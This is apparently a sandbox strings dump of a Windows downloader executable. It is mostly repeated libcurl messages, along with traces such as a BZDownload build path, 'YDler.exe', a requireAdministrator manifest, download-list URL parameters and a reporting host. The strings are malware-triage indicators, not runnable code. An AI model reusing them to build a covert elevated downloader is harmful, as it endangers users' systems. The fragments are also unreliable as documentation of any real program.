schannel: SSL/TLS connection with %s port %hu (step 3/3)
schannel: failed to retrieve remote cert context
select/poll on SSL/TLS socket, errno: %d
select/poll on SSL socket, errno: %d
schannel: Curl_read_plain returned CURLE_AGAIN
schannel: Curl_read_plain returned CURLE_RECV_ERROR
schannel: Curl_read_plain returned error %d
schannel: failed to read data from server: %s
schannel: shutting down SSL/TLS connection with %s port %hu
schannel: ApplyControlToken failure: %s
schannel: failed to send close msg: %s (bytes written: %zd)
%c%c==
%c%c%c=
%c%c%c%c
CLIENT libcurl 7.53.1
MATCH %s %s %s
DEFINE %s %s
WSAStartup failed (%d)
insufficient winsock version to support telnet
%s IAC %s
%s IAC %d
%s %s %s
%s %s %d
%s %d %d
Sending data failed (%d)
%s IAC SB
%s (unsupported)
%d (unknown)
USER,%s
7[^= ]%*[ =]%5s
Syntax error in telnet option: %s
Unknown telnet option %s
%c%c%c%c%s%c%c
7[^,],7s
%c%s%c%s
WS2_32.DLL
failed to load WS2_32.DLL (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEnumNetworkEvents function (%d)
WSACreateEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACloseEvent failed (%d)
FreeLibrary(wsock2) failed (%d)
TFTP
set timeouts for state %d; Total %ld, retry %d maxtry %d
got option=(%s) value=(%s)
blksize is larger than max supported
%s (%d)
blksize is smaller than min supported
%s (%ld)
%s (%d) %s (%d)
invalid tsize -:%s:- value in OACK packet
%s%c%s%c
tftp_send_first: internal error
Received last DATA packet block %d again.
Received unexpected DATA packet block %d, expecting block %d
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: internal error
Received ACK for block %d, expecting %d
tftp_tx: giving up waiting for block %d ack
tftp_tx: internal error, event: %i
TFTP finished
bind() failed; %s
TFTP response timeout
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: %s
LDAP local: trying to establish %s connection
LDAP local: Cannot connect to %s:%ld
LDAP local: ldap_simple_bind_s %s
LDAP remote: %s
There are more than %d entries
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
Last-Modified: %s, d %s M d:d:d GMT
Refusing to issue an RTSP request [%s] without a session ID.
Transport:
Transport: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Range: %s
%s %s RTSP/1.0
Session: %s
%s%s%s%s%s%s%s%s
Unable to read the CSeq header: [%s]
Got RTSP Session ID Line [%s], but wanted ID [%s]
curl
LOGIN %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s
No known authentication mechanisms supported!
LIST "%s" *
SELECT %s
FETCH %s BODY[%s]<%s>
FETCH %s BODY[%s]
APPEND %s (\Seen) {%I64d}
SEARCH %s
LOGINDISABLED
STARTTLS not supported.
Access denied. %c
%cd
%s %s
USER %s
APOP %s %s
AUTH %s %s
AUTH %s
STLS not supported.
Authentication failed: %d
PASS %s
SMTP
SMTPS
EHLO %s
HELO %s
MAIL FROM:%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s SIZE=%s
RCPT TO:%s
RCPT TO:<%s>
Got unexpected smtp-server response: %d
STARTTLS denied, code %d
Remote access denied: %d
Command failed: %d
MAIL failed: %d
RCPT failed: %d
DATA failed: %d
PORT
FTPS
Preparing for accepting server on data port
FTP response timeout
FTP response aborted due to select/poll error: %d
CWD %s
getsockname() failed: %s
failed to resolve the address provided to PORT: %s
socket failure: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) failed: %s
bind() failed, we ran out of ports!
%s |%d|%s|%hu|
Failure sending EPRT command: %s
,%d,%d
Failure sending PORT command: %s
Connect data stream passively
PRET %s
PRET STOR %s
PRET RETR %s
REST %d
SIZE %s
MDTM %s
APPE %s
STOR %s
RETR %s
%c%c%c%u%c
Illegal port number in EPSV reply
%d,%d,%d,%d,%d,%d
Skip %d.%d.%d.%d for data connection, re-use %s instead
Bad PASV/EPSV response: d
Can't resolve proxy host %s:%hu
Can't resolve new host %s:%hu
Failed to do PORT
dddddd
ddd d:d:d GMT
unsupported MDTM reply format
Got a d response code instead of the assumed 200
ftp server doesn't support SIZE
Failed FTP upload: 

RETR response: d
PBSZ %d
ACCT %s
Access denied: d
ACCT rejected by server: d
Got a d ftp-server response when 220 was expected
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
PROT %c
Entry path is '%s'
QUOT command failed with d
MKD %s
Failed to MKD dir: d
PRET command not accepted: d
Remembering we are in dir "%s"
Failure sending ABOR command: %s
server did not report OK, got %d
QUOT string not accepted: %s
TYPE %c
Connecting to %s (%s) port %d
ftp_perform ends with SECONDARY: %d
Wildcard - START of "%s"
Wildcard - "%s" skipped by user
Failure sending QUIT command: %s
Uploading to a URL without a file name!
login
password
%sAuthorization: Digest %s
%sAuthorization: NTLM %s
SOCKS4%s: connecting to HTTP proxy %s port %d
SOCKS4 communication to %s:%d
SOCKS4 connect to IPv4 %s (locally resolved)
SOCKS4 connection to %s not supported
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
SOCKS5: connecting to HTTP proxy %s port %d
SOCKS5 communication to %s:%d
User was rejected by the SOCKS5 server (%d %d).
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
SOCKS5 connect to IPv4 %s (locally resolved)
SOCKS5 connection to %s not supported
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
Content-Length: in d response
Transfer-Encoding: in d response
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
.jpeg
.html
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed; boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
------------------------xx
NTLM handshake failure (type-3 message): Status=%x
%sAuthorization: Negotiate %s
2.5.4.3
2.5.29.17
1.2.840.10040.4.1
1.2.840.10040.4.3
1.2.840.10045.2.1
ecPublicKey
1.2.840.10045.3.0.1
1.2.840.10045.4.1
1.2.840.10046.2.1
1.2.840.113549.1.1.1
1.2.840.113549.1.1.2
1.2.840.113549.1.1.4
1.2.840.113549.1.1.5
1.2.840.113549.1.1.10
1.2.840.113549.1.1.14
1.2.840.113549.1.1.11
1.2.840.113549.1.1.12
1.2.840.113549.1.1.13
1.2.840.113549.2.2
1.2.840.113549.2.5
1.3.14.3.2.26
2.5.4.4
2.5.4.5
2.5.4.6
2.5.4.7
2.5.4.8
2.5.4.9
2.5.4.10
2.5.4.11
2.5.4.12
2.5.4.13
2.5.4.17
2.5.4.41
2.5.4.42
2.5.4.43
2.5.4.44
2.5.4.45
2.5.4.46
2.5.4.65
1.2.840.113549.1.9.1
2.5.4.72
2.5.29.18
2.5.29.19
2.16.840.1.101.3.4.2.4
2.16.840.1.101.3.4.2.1
2.16.840.1.101.3.4.2.2
2.16.840.1.101.3.4.2.3
x:
%s%lx
%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s
%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s
%s: %s
RSA Public Key (%lu bits)
RSA Public Key
dsa(pub_key)
dh(pub_key)
- Subject: %s
Issuer: %s
Serial Number: %s
Signature Algorithm: %s
Start Date: %s
Expire Date: %s
Public Key Algorithm
Public Key Algorithm: %s
Signature: %s
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
Cert
KGS!@#$%server response timeout
LOGIN
Unsupported SASL authentication mechanism
0123456789-
SSPI error: %s failed: %s
rcmd
%s/%s
User was rejected by the SOCKS5 server (%u %u).
Invalid SSPI authentication response type (%u %u).
SOCKS5 server authencticated user %s with GSS-API.
SOCKS5 server supports GSS-API %s data protection.
Invalid SSPI encryption response type (%u %u).
SOCKS5 access with%s protection granted.
%s xxxxxxxxxxxxxxxx
user=%s
auth=Bearer %s
host=%s
port=%ld
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
Visual C   CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
operator
GetProcessWindowStation
%d.%d.%d (%s) 0x%x-0x%x
MDp_%d_(
).dmp
GET %s HTTP/1.1
Host: %s%s
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
HTTP/1.1
HTTP/1.0
@1_360.exe
%d.%d.%d.%d
xlurl
descr_downurl
list_url
list_cmd
%s /S
/select, %s
%s:%d
&type=%d
POST %s HTTP/1.1
Host: %s
Content-Length: %d
Content-Type:application/x-www-form-urlencoded
kic.disk
mzd.live
kb.mdisk
<4,$?7/'
(3-!0,1'8"5.*2$
%s%d.%d
hXXp://
E:\[Project]\[BaizhuLocalStorage]\Output\Release\BZDownload.pdb
zcÁ
.?AVduReportView@@
.?AV?$CSingleton@VCDownloadAppDataReport@@@QSUtil@@
.?AVCDownloadAppDataReport@@
.?AVCTaskParam2@?$CTaskMgrHelper@VCDownloadAppDataReport@@@minilib@@
.?AVCCURLWrapper@@
.?AVCWebContainer@@
libcurl/7.53.1 WinSSL
%I%X,
.QAY9E?
PeekNamedPipe
GetCPInfo
GetProcessHeap
RegOpenKeyExA
RegCloseKey
CryptImportKey
CryptDestroyKey
CertFreeCertificateContext
GetViewportOrgEx
SetViewportOrgEx
GdiplusShutdown
ShellExecuteW
ShellExecuteA
GetKeyState
WinHttpReadData
WinHttpAddRequestHeaders
WinHttpQueryDataAvailable
WinHttpOpenRequest
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpOpen
WinHttpCloseHandle
WinHttpConnect
WinHttpSendRequest
WinHttpCrackUrl
WinHttpSetTimeouts
:?49) 3)
%9q%S
4448407
(;(=( 65\;U90(F50%0;(?P1O8@0)%(A2TE';@20A2:#:08.089LH _U,B&  ;75JO717150 00% 657W?;%F<<V6#
.text
`.rdata
@.data
@.rsrc
@.reloc
(;(=|65\;
7W?;%F<<V6#
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
CRYPT32.dll
d3d9.dll
dbghelp.dll
GDI32.dll
gdiplus.dll
IMM32.dll
MSIMG32.dll
ole32.dll
OLEAUT32.dll
RASAPI32.dll
SETUPAPI.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
VERSION.dll
WINHTTP.dll
WLDAP32.dll
WS2_32.dll
error: [%s] is repeated
%s_%s_%s
reportview
config.xml
DirectUI.js
&#xX;
</%s>
%s="%s"
%s='%s'
<!--%s-->
version="%s"
encoding="%s"
standalone="%s"
[%d]%s
RGB(%d,%d,%d)
(%d,%d)
OnVScroll Error pos[%d]
VertScrollBar Show[%d]
HorzScrollBar Show[%d]
duReportView
nSel :%d
ShockwaveFlash.ShockwaveFlash
AddResObj [%s] failed
<Unknown:%d>
failed to loading image[%s]
combase.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
USER32.DLL
2.cmd
nMozilla post test/1.0
data.goosai.com
x/report/exception
kernel32.dll
page1_check_lk_%d
page1_check_lk_text_%d
page1_check_hk_%d
page1_check_hk_text_%d
page1_bottom_check_group%d
page1_btn_icon_%d
page1_icon_%d
page1_title_%d
page1_check_item_text_%d
page1_check_item_%d
page1_desc_%d
page1_list_item_%d
%.02f %s
page3_check_lk_%d
page3_check_lk_text_%d
page3_check_hk_%d
page3_check_hk_text_%d
page3_bottom_check_group%d
page3_btn_icon_%d
page3_icon_%d
page3_title_%d
page3_check_item_text_%d
page3_check_item_%d
page3_desc_%d
page3_list_item_%d
page3_bottom_check_lk_%d
ntdll.dll
Kernel32.dll
errorUrl
Shell.Explorer
c:\%original file name%.exe
2.1.0.704
YDler.exe

%original file name%.exe_3676_rwx_00C81000_00138000:

hu.cf
D$(Xj
D$0XY
SSSSh
hh h!"hh#$hhhh%&'hhh(h)*h hhh,-.hh/0123hhhh4h5hhhhhhh6hhhhhh789:;<hhhhhhhh=hhh>?@ABCDEhhhhFhhhhGHhhhhhIhJKLhhhhhMNhhhOOhhPhhhhhhhhhQhhRhSTUVWhXhhhhhhYZ[h\hh]^_hh`hahhbhcdhhefg
11111111111111111
>%ufj
8%u*@Sj%
t.Gj:W
j.Yf;
_tcPVj@
r%f;M
.PjRW
inflate 1.1.3 Copyright 1995-1998 Mark Adler
Connection #%ld to host %s left intact
Pipe broke: handle %p, url = %s
In state %d with no easy_conn, bail out!
Operation timed out after %ld milliseconds with %I64d out of %I64d bytes received
Operation timed out after %ld milliseconds with %I64d bytes received
Hostname '%s' was found in DNS cache
Internal error removing splay node = %d
Internal error clearing splay node = %d
ignoring failed cookie_init for %s
23[^;
=] =I99[^;
httponly
skipped cookie with bad tailmatch domain: %s
#HttpOnly_
%s cookie %s="%s" for domain %s, path %s, expire %I64d
%s%s%s
# Netscape HTTP Cookie File
# hXXps://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
WARNING: failed to save cookies in %s
security.dll
secur32.dll
.Aproxy
Could not resolve %s: %s
init_resolve_thread() failed for %s; %s
getaddrinfo() failed for %s:%d; %s
Hostname %s was found in DNS cache
%5[^:]:%d
Couldn't parse CURLOPT_RESOLVE removal entry '%s'!
%5[^:]:%d:%5s
Couldn't parse CURLOPT_RESOLVE entry '%s'!
Address in '%s' found illegal!
Added %s:%d:%s to DNS cache
Unrecognized parameter value passed via CURLOPT_SSLVERSION
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
can pipeline
Found bundle for host %s: %p [%s]
Server doesn't support multi-use yet, wait
Server doesn't support multi-use (yet)
Could pipeline, but not asked to!
Pipe is full, skip (%zu)
Multiplexed connection found!
Found pending candidate for reuse and CURLOPT_PIPEWAIT is set
Connected to %s (%s) port %ld (#%ld)
IDN support not present, can't parse Unicode domains
Protocol "%s" not supported or disabled in libcurl
Illegal characters found in URL
Bad URL, colon is first character
Bad URL
127.0.0.1/
Invalid file://hostname/, expected localhost or 127.0.0.1 or none
/:]:%3[/]%[^
<url> malformed
SMTP.
smtp
Unwillingly accepted illegal URL using %d slash%s!
%s://%s%s
Rebuilt URL to: %s
Please URL encode %% as %%, see RFC 6874.
http_proxy
https
http:
Unsupported proxy scheme for '%s'
Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.
No valid port number in proxy string (%s)
[%*45[0123456789abcdefABCDEF:.]%c
;type=%c
%s://%s%s%s:%hu%s%s%s
Port number out of range
Illegal port number
Couldn't find host %s in the _netrc file; using defaults
PTF@example.com
No valid port number in connect to host string (%s)
Connecting to hostname: %s
Connecting to port: %d
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
%s://%s
Found connection %ld, with requests in the pipe (%zu)
Re-using existing connection! (#%ld) with %s %s
No more connections allowed to host: %d
User-Agent: %s
Send failure: %s
Recv failure: %s
Write callback asked for PAUSE when not supported!
[%s %s %s]
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
connect to %s port %ld failed: %s
Failed to connect to %s port %ld: %s
Could not set TCP_NODELAY: %s
TCP_NODELAY set
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Immediate connect fail for %s: %s
ftps
smtps
tftp
7.53.1
libcurl/7.53.1
operation aborted by callback
Read callback asked for PAUSE when not supported!
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
HTTP server doesn't seem to support byte ranges. Cannot resume.
Simulate a HTTP 304 response!
%s in chunked-encoding
Rewinding stream by : %zu bytes on url %s (size = %I64d, maxdownload = %I64d, bytecount = %I64d, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %I64d, maxdownload = %I64d, bytecount = %I64d
No URL set!
%%x
[^?&/:]://%c
Issue another request to this URL: '%s'
Disables POST, goes with %s
HTTPS
%s:%s
%sAuthorization: Basic %s
The requested URL returned error: %d
%s auth using %s with user '%s'
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Referer: %s
Accept-Encoding: %s
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
PTF://
Range: bytes=%s
Content-Range: bytes %s%I64d/%I64d
Content-Range: bytes %s/%I64d
PTF://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
HTTP/
Avoided giant realloc for header (max is %d)!
The requested URL returned error: %s
Connection closure while negotiating auth (HTTP 1.0?)
HTTP error before end of send, keep sending
HTTP error before end of send, stop sending
HTTP/%d.%d %d
HTTP/2 %d
Lying server, not serving HTTP/2
HTTP =
RTSP/%d.%d =
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
%s:%ld
--:--:--
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s
@Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
Conn: %ld (%p) Receive pipe weight: (%I64d/%zu), penalized: %s
Site %s:%d is pipeline blacklisted
Server %s is blacklisted
d:d:d%n
d:d%n
0123456789
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
Error in the HTTP2 framing layer
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
SSL public key does not match pinned public key
SSL server certificate status verification FAILED
Stream error in the HTTP/2 framing layer
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
SEC_E_CERT_EXPIRED
SEC_E_CERT_UNKNOWN
SEC_E_CERT_WRONG_USAGE
SEC_E_KDC_CERT_EXPIRED
SEC_E_KDC_CERT_REVOKED
SEC_E_NO_KERB_KEY
SEC_E_NO_S4U_PROT_SUPPORT
SEC_E_QOP_NOT_SUPPORTED
SEC_E_SMARTCARD_CERT_EXPIRED
SEC_E_SMARTCARD_CERT_REVOKED
SEC_E_STRONG_CRYPTO_NOT_SUPPORTED
SEC_E_UNSUPPORTED_FUNCTION
SEC_E_UNSUPPORTED_PREAUTH
SEC_E_ILLEGAL_MESSAGE (0xX) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.
%s (0xX)
%s - %s
schannel: SSL/TLS connection with %s port %hu (step 1/3)
schannel: incremented credential handle refcount = %d
schannel: disabled server certificate revocation checks
schannel: checking server certificate revocation
schannel: verifyhost setting prevents Schannel from comparing the supplied target name with the subject names in server certificates.
Schannel: TLS 1.3 is not yet supported
Unrecognized parameter passed via CURLOPT_SSLVERSION
schannel: SNI or certificate check failed: %s
schannel: AcquireCredentialsHandle failed: %s
schannel: using IP address, SNI is not supported by OS.
schannel: initial InitializeSecurityContext failed: %s
schannel: SSL/TLS connection with %s port %hu (step 2/3)
schannel: a client certificate has been requested
schannel: next InitializeSecurityContext failed: %s
schannel: SSL/TLS connection with %s port %hu (step 3/3)
schannel: failed to retrieve remote cert context
select/poll on SSL/TLS socket, errno: %d
select/poll on SSL socket, errno: %d
schannel: Curl_read_plain returned CURLE_AGAIN
schannel: Curl_read_plain returned CURLE_RECV_ERROR
schannel: Curl_read_plain returned error %d
schannel: failed to read data from server: %s
schannel: shutting down SSL/TLS connection with %s port %hu
schannel: ApplyControlToken failure: %s
schannel: failed to send close msg: %s (bytes written: %zd)
%c%c==
%c%c%c=
%c%c%c%c
CLIENT libcurl 7.53.1
MATCH %s %s %s
DEFINE %s %s
WSAStartup failed (%d)
insufficient winsock version to support telnet
%s IAC %s
%s IAC %d
%s %s %s
%s %s %d
%s %d %d
Sending data failed (%d)
%s IAC SB
%s (unsupported)
%d (unknown)
USER,%s
7[^= ]%*[ =]%5s
Syntax error in telnet option: %s
Unknown telnet option %s
%c%c%c%c%s%c%c
7[^,],7s
%c%s%c%s
WS2_32.DLL
failed to load WS2_32.DLL (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEnumNetworkEvents function (%d)
WSACreateEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACloseEvent failed (%d)
FreeLibrary(wsock2) failed (%d)
TFTP
set timeouts for state %d; Total %ld, retry %d maxtry %d
got option=(%s) value=(%s)
blksize is larger than max supported
%s (%d)
blksize is smaller than min supported
%s (%ld)
%s (%d) %s (%d)
invalid tsize -:%s:- value in OACK packet
%s%c%s%c
tftp_send_first: internal error
Received last DATA packet block %d again.
Received unexpected DATA packet block %d, expecting block %d
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: internal error
Received ACK for block %d, expecting %d
tftp_tx: giving up waiting for block %d ack
tftp_tx: internal error, event: %i
TFTP finished
bind() failed; %s
TFTP response timeout
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: %s
LDAP local: trying to establish %s connection
LDAP local: Cannot connect to %s:%ld
LDAP local: ldap_simple_bind_s %s
LDAP remote: %s
There are more than %d entries
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
Last-Modified: %s, d %s M d:d:d GMT
Refusing to issue an RTSP request [%s] without a session ID.
Transport:
Transport: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Range: %s
%s %s RTSP/1.0
Session: %s
%s%s%s%s%s%s%s%s
Unable to read the CSeq header: [%s]
Got RTSP Session ID Line [%s], but wanted ID [%s]
curl
LOGIN %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s
No known authentication mechanisms supported!
LIST "%s" *
SELECT %s
FETCH %s BODY[%s]<%s>
FETCH %s BODY[%s]
APPEND %s (\Seen) {%I64d}
SEARCH %s
LOGINDISABLED
STARTTLS not supported.
Access denied. %c
%cd
%s %s
USER %s
APOP %s %s
AUTH %s %s
AUTH %s
STLS not supported.
Authentication failed: %d
PASS %s
SMTP
SMTPS
EHLO %s
HELO %s
MAIL FROM:%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s SIZE=%s
RCPT TO:%s
RCPT TO:<%s>
Got unexpected smtp-server response: %d
STARTTLS denied, code %d
Remote access denied: %d
Command failed: %d
MAIL failed: %d
RCPT failed: %d
DATA failed: %d
PORT
FTPS
Preparing for accepting server on data port
FTP response timeout
FTP response aborted due to select/poll error: %d
CWD %s
getsockname() failed: %s
failed to resolve the address provided to PORT: %s
socket failure: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) failed: %s
bind() failed, we ran out of ports!
%s |%d|%s|%hu|
Failure sending EPRT command: %s
,%d,%d
Failure sending PORT command: %s
Connect data stream passively
PRET %s
PRET STOR %s
PRET RETR %s
REST %d
SIZE %s
MDTM %s
APPE %s
STOR %s
RETR %s
%c%c%c%u%c
Illegal port number in EPSV reply
%d,%d,%d,%d,%d,%d
Skip %d.%d.%d.%d for data connection, re-use %s instead
Bad PASV/EPSV response: d
Can't resolve proxy host %s:%hu
Can't resolve new host %s:%hu
Failed to do PORT
dddddd
ddd d:d:d GMT
unsupported MDTM reply format
Got a d response code instead of the assumed 200
ftp server doesn't support SIZE
Failed FTP upload: 

RETR response: d
PBSZ %d
ACCT %s
Access denied: d
ACCT rejected by server: d
Got a d ftp-server response when 220 was expected
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
PROT %c
Entry path is '%s'
QUOT command failed with d
MKD %s
Failed to MKD dir: d
PRET command not accepted: d
Remembering we are in dir "%s"
Failure sending ABOR command: %s
server did not report OK, got %d
QUOT string not accepted: %s
TYPE %c
Connecting to %s (%s) port %d
ftp_perform ends with SECONDARY: %d
Wildcard - START of "%s"
Wildcard - "%s" skipped by user
Failure sending QUIT command: %s
Uploading to a URL without a file name!
login
password
%sAuthorization: Digest %s
%sAuthorization: NTLM %s
SOCKS4%s: connecting to HTTP proxy %s port %d
SOCKS4 communication to %s:%d
SOCKS4 connect to IPv4 %s (locally resolved)
SOCKS4 connection to %s not supported
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
SOCKS5: connecting to HTTP proxy %s port %d
SOCKS5 communication to %s:%d
User was rejected by the SOCKS5 server (%d %d).
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
SOCKS5 connect to IPv4 %s (locally resolved)
SOCKS5 connection to %s not supported
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
Content-Length: in d response
Transfer-Encoding: in d response
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
.jpeg
.html
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed; boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
------------------------xx
NTLM handshake failure (type-3 message): Status=%x
%sAuthorization: Negotiate %s
2.5.4.3
2.5.29.17
1.2.840.10040.4.1
1.2.840.10040.4.3
1.2.840.10045.2.1
ecPublicKey
1.2.840.10045.3.0.1
1.2.840.10045.4.1
1.2.840.10046.2.1
1.2.840.113549.1.1.1
1.2.840.113549.1.1.2
1.2.840.113549.1.1.4
1.2.840.113549.1.1.5
1.2.840.113549.1.1.10
1.2.840.113549.1.1.14
1.2.840.113549.1.1.11
1.2.840.113549.1.1.12
1.2.840.113549.1.1.13
1.2.840.113549.2.2
1.2.840.113549.2.5
1.3.14.3.2.26
2.5.4.4
2.5.4.5
2.5.4.6
2.5.4.7
2.5.4.8
2.5.4.9
2.5.4.10
2.5.4.11
2.5.4.12
2.5.4.13
2.5.4.17
2.5.4.41
2.5.4.42
2.5.4.43
2.5.4.44
2.5.4.45
2.5.4.46
2.5.4.65
1.2.840.113549.1.9.1
2.5.4.72
2.5.29.18
2.5.29.19
2.16.840.1.101.3.4.2.4
2.16.840.1.101.3.4.2.1
2.16.840.1.101.3.4.2.2
2.16.840.1.101.3.4.2.3
x:
%s%lx
%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s
%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s
%s: %s
RSA Public Key (%lu bits)
RSA Public Key
dsa(pub_key)
dh(pub_key)
- Subject: %s
Issuer: %s
Serial Number: %s
Signature Algorithm: %s
Start Date: %s
Expire Date: %s
Public Key Algorithm
Public Key Algorithm: %s
Signature: %s
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
Cert
KGS!@#$%server response timeout
LOGIN
Unsupported SASL authentication mechanism
0123456789-
SSPI error: %s failed: %s
rcmd
%s/%s
User was rejected by the SOCKS5 server (%u %u).
Invalid SSPI authentication response type (%u %u).
SOCKS5 server authencticated user %s with GSS-API.
SOCKS5 server supports GSS-API %s data protection.
Invalid SSPI encryption response type (%u %u).
SOCKS5 access with%s protection granted.
%s xxxxxxxxxxxxxxxx
user=%s
auth=Bearer %s
host=%s
port=%ld
function not supported
